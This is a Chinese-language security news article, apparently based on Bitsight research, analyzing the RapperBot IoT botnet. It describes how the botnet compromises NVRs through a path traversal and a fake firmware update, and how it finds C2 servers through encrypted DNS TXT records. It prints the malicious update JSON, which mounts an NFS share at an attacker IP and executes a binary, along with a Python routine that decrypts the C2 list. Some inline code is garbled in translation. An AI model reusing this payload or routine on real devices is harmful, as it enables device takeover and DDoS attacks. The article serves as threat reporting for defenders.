网络安全研究人员于 2025 年 4 月初开始检测到来自受感染网络录像机 (NVR) 和其他边缘设备的 UDP 洪水流量出现惊人的激增。
在感染后的几毫秒内,这些设备就被武器化,将大量数据包定向毫无戒心的目标,导致服务中断和大量带宽消耗。
Bitsight 分析师将这一活动确定为他们称为 RapperBot 的新型僵尸网络的作品,并指出其异常快速的杀伤链以及对传统硬件约束的创新使用来逃避检测。
该恶意软件的出现遵循一种熟悉的模式:威胁行为者扫描互联网以查找暴露的 Web 界面,暴力破解或利用默认凭据,并提供伪装成固件更新的恶意负载。
执行后,RapperBot 会立即开始两个不同的作:加密的 DNS TXT 记录查询以获取命令和控制 (C2) IP 地址,以及端口 80 上的连续 UDP 泛洪。
影响评估显示,单个设备吞吐量超过 1 Gbps,在针对主要目标(包括基于云的搜索提供商和社交媒体平台)的协调活动中,聚合僵尸网络容量的峰值超过 7 Tbps。
尽管它的效力很大,但该恶意软件的行为非常简单:它挂载一个远程 NFS 共享来获取和执行特定于架构的二进制文件,然后自我删除以完全在内存中运行。
Bitsight 研究人员指出,这种策略利用了许多物联网设备上的最小 BusyBox 环境,这些设备没有标准下载工具。curl/dev/tcp
通过利用 NVR 的固件更新机制(特别是在 Web 服务器中进行路径遍历零日,然后通过 NFS 进行二进制获取),RapperBot 避免了触发防病毒警报的常见文件系统伪影。
固件更新 JSON 有效负载(来源 – Bitsight)
在幕后,RapperBot 的 C2 发现机制依赖于托管在 OpenNIC 域(例如 和 )上的加密 TXT 记录。iranistrash.librepool.rentcheapcars.sbs
该恶意软件通过从硬编码的子域、域和 TLD 列表中随机选择来构建 32 个预定主机名之一,然后根据自定义 DNS 服务器(1.1.1.1、8.8.8.8 等)解析这些名称。
TXT 响应包含一个管道分隔的加密 IP 地址列表,机器人使用类似 RC4 的自定义算法解密,然后进行 base-56 解码。
下面显示了说明解密阶段的 Python 片段:-
# Stage 1: Key Scheduling Algorithm (KSA-like) S = list(range(56)) key = (first_byte_index + second_byte_index * 56) for i in range(55, 0, -1): key = (0x41C64E6D * key + 0x3039) & 0xFFFFFFFF j = key % (i + 1) S[i], S[j] = S[j], S[i] # Stage 2: Keystream-based XOR decryption keystream = bytearray() i = j = 0 for b in encrypted_payload[2:]: i = (i + 1) % 56 j = (j + S[i]) % 56 S[i], S[j] = S[j], S[i] keystream. Append(S[(S[i] + S[j]) % 56] ^ b) # Stage 3: Base-56 decoding to obtain plaintext IP list plaintext = base56_decode(keystream) print(plaintext) # e.g., b"194.226.121.51|188.92.28.62|..."
感染机制
RapperBot 的感染媒介利用易受攻击的 NVR 的管理端口 (TCP 34567)。
识别暴露的设备后,攻击者利用路径遍历缺陷下载帐户配置文件,从而泄露散列和明文凭据。
使用这些凭据,攻击者会启动虚假固件更新,通过专有更新协议发送 ZIP 格式的有效负载。
ZIP 存档包含一个简单的 JSON,指示设备挂载并执行有效负载脚本:-InstallDesc104.194.9.127:/nfs
{
"UpgradeCommand": [
{
"Command": "Shell",
"Script": "cd /var;mount -o intr,nolock,exec 104.194.9.127:/nfs z;z/z;"
}
]
}这种方法通过使用 NFS(即使在最小的嵌入式 Linux 系统上也普遍支持的协议)巧妙地绕过了 NVR 的 BusyBox 限制(没有、或)。wgetcurl/ dev/tcp
该脚本遍历多个 ARM 架构二进制文件,直到成功,写入一个标记文件,然后清理,不留下磁盘上的可执行文件。.r
从已挂载的内存立即执行可显着减少取证占用空间,并实现从良性设备到主动 DDoS 参与者的瞬间转换。
1. 本版块文章内容及资料部分来源于网络,不代表本站观点,不对其真实性负责,也不构成任何建议。
2. 部分内容由网友自主投稿、编辑整理上传,本站仅提供交流平台,不为该类内容的版权负责。
3. 本版块提供的信息仅作参考,不保证信息的准确性、有效性、及时性和完整性。
4. 若您发现本版块有侵犯您知识产权的内容,请及时与我们联系,我们会尽快修改或删除。
5. 使用者违规、不可抗力(如黑客攻击)或第三方擅自转载引发的争议,联盟不承担责任。
6. 联盟可修订本声明,官网发布即生效,继续使用视为接受新条款。
